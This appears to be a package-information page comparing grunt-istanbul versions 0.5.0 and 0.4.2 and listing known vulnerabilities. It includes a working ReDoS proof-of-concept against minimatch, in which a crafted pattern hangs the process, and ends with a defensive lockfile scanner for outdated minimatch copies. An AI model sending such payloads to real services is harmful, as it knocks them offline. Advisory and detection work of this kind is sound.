Grunt-istanbul is a Grunt plugin designed to provide JavaScript code coverage analysis. Version 0.5.0 and version 0.4.2 share core functionality as JavaScript code coverage tools tightly integrated with the Grunt task runner but show some differences that impact the developer experience. Both versions list dependencies like chalk for terminal styling, istanbul for the core instrumentation and reporting, and nue for some internal functionalities. Common devDependencies include standard Grunt plugins such as grunt-contrib-jshint for code linting, grunt-contrib-nodeunit for unit testing, and grunt-contrib-clean for cleanup tasks. The peerDependencies entry in both versions specifies the necessity of having Grunt version 0.4.5 installed to ensure compatibility.
The critical distinction is the introduction of isparta as a devDependency in version 0.5.0. Isparta provides ES6/ES2015 code coverage, which suggests that version 0.5.0 introduced or improved support for modern JavaScript syntax. Version 0.5.0 also pins isparta at ^2.2.0. This makes version 0.5.0 the more compelling choice for developers working with newer JavaScript features who want accurate coverage reports for their ES6+ code. Version 0.5.0 was released on March 26, 2015, shortly after version 0.4.2, released on March 14, 2015.
All the vulnerabilities related to version 0.5.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// a pattern with a very long run of backslashes triggers the pathological regex behaviour
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit: the call below hangs on affected versions.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
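Both entries above are remediated by updating minimatch, and in a plugin-heavy Grunt build the old copy is often a nested transitive install rather than the top-level one. The following is an added example, not code from grunt-istanbul or minimatch: it scans a package-lock.json "packages" map (lockfileVersion 2/3) for any minimatch below the 3.0.2 fix named above. The lockfile contents, the plugin name and the versions in it are constructed sample data.

```javascript
// Added example: locate minimatch copies older than the 3.0.2 fix in a lockfile.
const FIXED_MINIMATCH = "3.0.2";

// Compare two dotted numeric versions; returns -1, 0 or 1.
// Any pre-release suffix is stripped, which suffices for the releases in lockfiles.
function compareVersions(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Return every installed path whose package is minimatch below the fixed version.
function findVulnerableMinimatch(lock, fixed = FIXED_MINIMATCH) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    // The root project is keyed ""; nested installs end in ".../node_modules/minimatch".
    if (path === "" || !path.endsWith("node_modules/minimatch")) continue;
    if (!meta.version) continue; // link/workspace entries carry no version
    if (compareVersions(meta.version, fixed) < 0) {
      hits.push({ path, version: meta.version });
    }
  }
  return hits;
}

// Constructed lockfile (sample data): a patched top-level minimatch plus an old
// transitive copy nested under a hypothetical Grunt plugin.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "example-app", version: "1.0.0" },
    "node_modules/minimatch": { version: "3.1.2" },
    "node_modules/example-grunt-plugin": { version: "0.5.0" },
    "node_modules/example-grunt-plugin/node_modules/minimatch": { version: "2.0.10" },
  },
};

for (const f of findVulnerableMinimatch(SAMPLE_LOCK)) {
  console.log(`${f.path}: minimatch ${f.version} is below ${FIXED_MINIMATCH}; update required`);
}
```

Run it against a real lockfile by replacing SAMPLE_LOCK with `JSON.parse(require("fs").readFileSync("package-lock.json", "utf8"))`.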